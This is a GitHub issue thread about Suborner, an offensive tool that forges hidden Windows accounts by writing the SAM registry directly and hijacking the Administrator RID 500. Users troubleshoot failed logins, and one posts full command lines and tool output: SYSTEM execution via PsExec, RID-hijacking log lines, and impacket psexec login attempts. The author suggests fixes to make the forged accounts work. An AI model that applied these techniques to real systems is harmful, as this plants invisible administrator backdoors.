Unable to login to SMB with the created account

[pandatest2023]

Unable to login to SMB with the created account

[pandatest2023]

[lzzbb]

I have the same problem

[r4wd3r]

Hey!

Is it a domain controller? Suborner will not work against domain controllers since they don't use the MSV1_0.dll authentication package by default (no local user authentication).

[No-Github]

same problem, a workgroup environment

[r4wd3r]

That's weird. Could you please share more information about your environment? What happens if you create the account with the /machineaccount parameter set as no?

[pandatest2023]

That's weird. Could you please share more information about your environment? What happens if you create the account with the /machineaccount parameter set as no?
OS : Microsoft Windows Server 2008 R2 Datacenter
Ver: 6.1.7601 Service Pack 1 Build 7601

[r4wd3r]

@Phantom0000 I'll try to reproduce your environment when I get some time. In the meantime, please try to authenticate interactively (e.g. RDP, sign-in screen) with the suborner account created with the /machineaccount:no and let me know how it goes.

[UbuntuOS-git]

Can windows7 and server2012r2 be automated with Suborner? I tried and failed later. Or do I need to do it manually?

[jfma7]

@Phantom0000 I'll try to reproduce your environment when I get some time. In the meantime, please try to authenticate interactively (e.g. RDP, sign-in screen) with the suborner account created with the /machineaccount:no and let me know how it goes.

It doesn't work from my side. Win 10 environment.

[eabase]

@r4wd3r
Hi! I was checking your really informative & cool presentation. (Thank you!)
While trying to map out the ACB's you presented, I googled up what seem to be changes to those.

ACB - Account Control Bits

[1] 2.2.16 userAccountControl Bits
[2] Use the UserAccountControl flags to manipulate user account properties
[3] and this

Maybe that explains why it is no longer working?

Property flag	Value in hexadecimal
SCRIPT	0x0001
ACCOUNTDISABLE	0x0002
HOMEDIR_REQUIRED	0x0008
LOCKOUT	0x0010
PASSWD_NOTREQD	0x0020
PASSWD_CANT_CHANGE	0x0040
ENCRYPTED_TEXT_PWD_ALLOWED	0x0080
TEMP_DUPLICATE_ACCOUNT	0x0100
NORMAL_ACCOUNT	0x0200
INTERDOMAIN_TRUST_ACCOUNT	0x0800
WORKSTATION_TRUST_ACCOUNT	0x1000
SERVER_TRUST_ACCOUNT	0x2000
DONT_EXPIRE_PASSWORD	0x10000
MNS_LOGON_ACCOUNT	0x20000
SMARTCARD_REQUIRED	0x40000
TRUSTED_FOR_DELEGATION	0x80000
NOT_DELEGATED	0x100000
USE_DES_KEY_ONLY	0x200000
DONT_REQ_PREAUTH	0x400000
PASSWORD_EXPIRED	0x800000
TRUSTED_TO_AUTH_FOR_DELEGATION	0x1000000
PARTIAL_SECRETS_ACCOUNT	0x04000000

[hamigua9527]

Can you provide the author's environment and login method

[pshelton-skype]

I also cannot seemingly interact with the account after creating it. I'm testing on a Windows Azure virtual machine running the default Server 2022 Datacenter image created through the Azure portal.

PS C:\> PsExec.exe -s suborner64.exe /username:suborner8 /password:Password123456!

PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
      88
  .d88888b.                  S U B O R N E R
 d88P 88"88b
 Y88b.88        The Invisible Account Forger
 "Y88888b.                        by @r4wd3r
      88"88b                          v1.0.1
 Y88b 88.88P
  "Y88888P"               https://r4wsec.com
      88
 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

[-] Appending $ to username
[+] Suborner Account Data:
- Username: suborner8$
- Password: Password123456!
- RID: 1007
- Template Account RID: 500
- Account to hijack (RID): 500
- Machine account: True
--------------------------------------------
[+] Crafting suborner account suborner8$
[+] Crafted names key
[-] RID Hijacking: Setting victim's RID 500 to new account suborner8$ for impersonation
[-] Setting account as enabled as machine account
[+] Crafted F key
[-] Writing V account values
[-] Encrypting password for V
[-] NTLM Hash for password: BEE98DC086291586556711A645C6BD58
[+] Crafted V key
[-] Writing changes to registry
[+] The suborner account suborner8$ has been created!
C:\Users\remoteuser\suborner64.exe exited on pshelton-suborn with error code 0.

PS C:\> python .\psexec.py suborner8\$:[email protected] cmd
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

PS C:\>runas /user:suborner8 cmd
Enter the password for suborner8:
Attempting to start cmd as user "pshelton-suborn\suborner8" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\> runas /user:suborner8$ cmd
Enter the password for suborner8$:
Attempting to start cmd as user "pshelton-suborn\suborner8$" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\ > runas /user:suborner8\$ cmd
Enter the password for suborner8\$:
Attempting to start cmd as user "suborner8\$" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\> PsExec.exe -s suborner64.exe /username:suborner10 /password:Password123456! /machineaccount:no

PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
      88
  .d88888b.                  S U B O R N E R
 d88P 88"88b
 Y88b.88        The Invisible Account Forger
 "Y88888b.                        by @r4wd3r
      88"88b                          v1.0.1
 Y88b 88.88P
  "Y88888P"               https://r4wsec.com
      88
 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

[-] Appending $ to username
[+] Suborner Account Data:
- Username: suborner10$
- Password: Password123456!
- RID: 1009
- Template Account RID: 500
- Account to hijack (RID): 500
- Machine account: False
--------------------------------------------
[+] Crafting suborner account suborner10$
[+] Crafted names key
[-] RID Hijacking: Setting victim's RID 500 to new account suborner10$ for impersonation
[-] Setting account as enabled as normal account
[+] Crafted F key
[-] Writing V account values
[-] Encrypting password for V
[-] NTLM Hash for password: BEE98DC086291586556711A645C6BD58
[+] Crafted V key
[-] Writing changes to registry
[+] The suborner account suborner10$ has been created!
C:\Users\remoteuser\suborner64.exe exited on pshelton-suborn with error code 0.

PS C:\> runas /user:suborner10\$ cmd
Enter the password for suborner10\$:
Attempting to start cmd as user "suborner10\$" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\> runas /user:suborner10$ cmd
Enter the password for suborner10$:
Attempting to start cmd as user "pshelton-suborn\suborner10$" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\> runas /user:suborner10 cmd
Enter the password for suborner10:
Attempting to start cmd as user "pshelton-suborn\suborner10" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\> python .\psexec.py suborner10\$:[email protected] cmd
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

PS C:\> python .\psexec.py [email protected] cmd
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

PS C:\> python .\psexec.py [email protected] cmd
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] SMB SessionError: STATUS_ACCOUNT_LOCKED_OUT(The user account has been automatically locked because too many invalid logon attempts or password change attempts have been requested.)

This last account is the only time I've received something other than a blanket "The login attempt failed" error over RDP. I used RDP username localhost\suborner10$ and received:

As a security precaution, the user account has been locked because there were too many logon attempts or password change attempts. Wait a while before trying again, or contact your system administrator or technical support.

Otherwise it seems that none of the accounts can be interacted with successfully.

[r4wd3r]

Hello, everyone here! I am so sorry for the delay. I have been pretty busy these days.

I have not been able to reproduce this, but a person reached out to me via Discord, and I asked him to perform this. Apparently, this may have to do with how Suborner encrypts the NTLM hash to the SAM Encrypted hash.

Please try the following and let me know if you can access to the system @pshelton-skype @jfma7 @UbuntuOS-git @pandatest2023 @No-Github @lzzbb

1. Create a suborner account with the flag machine account set as no (i.e., /machineaccount:no)
2. Change the password of the account via net user (i.e., net user myaccount$ MySecretPassword123)
3. Try to connect via RDP/SMB to the system and see if you have the credentials error again.

[r4wd3r]

@eabase: Thanks for your thorough analysis. You are right, those are the ACB described by MSFT, yet those values are used to call the API with a structure s.a. USR_INFO_1 as an argument. AFAIK, if you set the flags to 0x1000 in this structure, it will write the value 0x80 in the SAM. You can try it to confirm this by directly calling the netuseradd API and setting the USER_INFO_1 structure and setting the flags with those values you shared and compare them with what is written in the SAM.